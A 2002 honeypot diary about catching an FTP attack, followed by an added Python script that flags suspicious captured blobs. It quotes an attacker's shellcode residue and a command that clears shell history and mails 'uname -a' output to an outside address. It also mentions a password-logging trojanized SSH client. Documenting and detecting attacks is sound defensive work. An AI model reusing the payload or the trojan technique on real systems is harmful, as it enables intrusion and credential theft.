Unknown1
At this moment (July 31, 2002) my third honeypot has
been running for some days. It's changed somewhat. First it was equipped
with a 40GB hard drive, now it only has 4. First it had a 3Com ISA network card,
now it has a cheap-ass PCI thingy. The latter 'upgrade' was because I
couldn't get Red Hat 7.1 stable with the 3Com card. I have to admit I really
didn't try hard though.
Not only the hardware and OS have changed. I hacked up the keylogger because
it didn't work well. The first problem I encountered was that the logger
didn't flush the output file; when the kiddos logged out, the buffered
output was never written to disk. The second problem was that it crashed.
The new version seems to work better, although it still has to be tested
out 'in the field'. Not only did I fix the logger, I also trojanized 'ssh',
the SSH client. It now logs passwords to a 'hidden' file. Can come in
handy :)
On Sunday Aug 11th, at 12:20 CEST, somebody connected
to port 21 and sent some stuff down the pipe. This stuff included:
3F3jT'=Rh/D=XjTj(XjXRhn/shh//biRSunset
HISTFILE;uname -a | mail xrecmsg@hotmail.com; mail xrecmsg@hotmail.com;exit
Now let's wait and see if someone checks his mail regularly.
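An added example, not the author's code: a small Python triage check a honeypot owner could run over captured port-21 blobs like the one above. It flags a mostly non-printable first stage that carries "/bin/sh" fragments, and a plain-text second stage that disables shell history, fingerprints the host and pipes the result to an external mail address. The fragment list, thresholds and sample bytes are assumptions constructed for this example.

```python
import re

# Indicator lists are assumptions for this example, not a rule set from the page.
# Exploit stages often push "/bin/sh" as 4-byte fragments, so partial strings count.
SHELL_FRAGMENTS = (b"/bin/sh", b"//sh", b"/bin", b"/bi", b"/sh")
CMD_PATTERNS = {
    "history disabled": re.compile(rb"(?:unset|export)?\s*HISTFILE\b"),
    "host fingerprint": re.compile(rb"\buname\s+-a\b"),
    "mail exfiltration": re.compile(rb"\|\s*mail\s+\S+@\S+"),
}

# Constructed samples: the printable residue of the first stage as quoted on
# the page, padded with non-printable bytes to mimic real shellcode; the
# command string that followed it; and a benign anonymous FTP login.
SAMPLE_STAGE1 = b"\xff\xfe" * 5 + b"3F3jT'=Rh/D=XjTj(XjXRhn/shh//biRS" + b"\xff\xfe" * 5
SAMPLE_STAGE2 = b"HISTFILE;uname -a | mail xrecmsg@hotmail.com; mail xrecmsg@hotmail.com;exit\n"
BENIGN = b"USER anonymous\r\nPASS guest@example.org\r\nLIST\r\n"


def nonprintable_ratio(data: bytes) -> float:
    """Share of bytes outside printable ASCII (tab, CR and LF count as printable)."""
    if not data:
        return 0.0
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return 1.0 - printable / len(data)


def shell_fragments(data: bytes) -> list:
    """Which of the known "/bin/sh" fragments appear in the blob."""
    return [frag.decode() for frag in SHELL_FRAGMENTS if frag in data]


def classify_capture(data: bytes, binary_threshold: float = 0.15) -> dict:
    """Return the indicators found in one captured blob plus an overall verdict."""
    result = {
        "nonprintable_ratio": round(nonprintable_ratio(data), 3),
        "shell_fragments": shell_fragments(data),
        "commands": [name for name, pat in CMD_PATTERNS.items() if pat.search(data)],
    }
    looks_binary = result["nonprintable_ratio"] >= binary_threshold
    # Plain shell commands on an FTP control channel are suspicious on their own;
    # a binary blob needs at least two shell fragments to avoid flagging file uploads.
    result["suspicious"] = bool(result["commands"]) or (
        looks_binary and len(result["shell_fragments"]) >= 2
    )
    return result


if __name__ == "__main__":
    for label, blob in (("stage1", SAMPLE_STAGE1), ("stage2", SAMPLE_STAGE2), ("benign", BENIGN)):
        print(label, classify_capture(blob))
```

Real exploits carry many more non-printable bytes than the padded sample, so the ratio threshold is deliberately low; tune it against your own benign FTP traffic.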
Well, somebody did check his mail. The guy rootkitted my system and began
scanning for vulnerable ftpds right away. His rootkit broke 'ls' and
'find', which both segfaulted without giving any useful output. This would
immediately arouse the suspicion of any sysadmin, but this unknown kiddo didn't
even notice it. Combined with the scanning he did, I disconnected the system
almost directly after the hack. He didn't do anything interesting with
the system, so I never looked into it. Next time I will.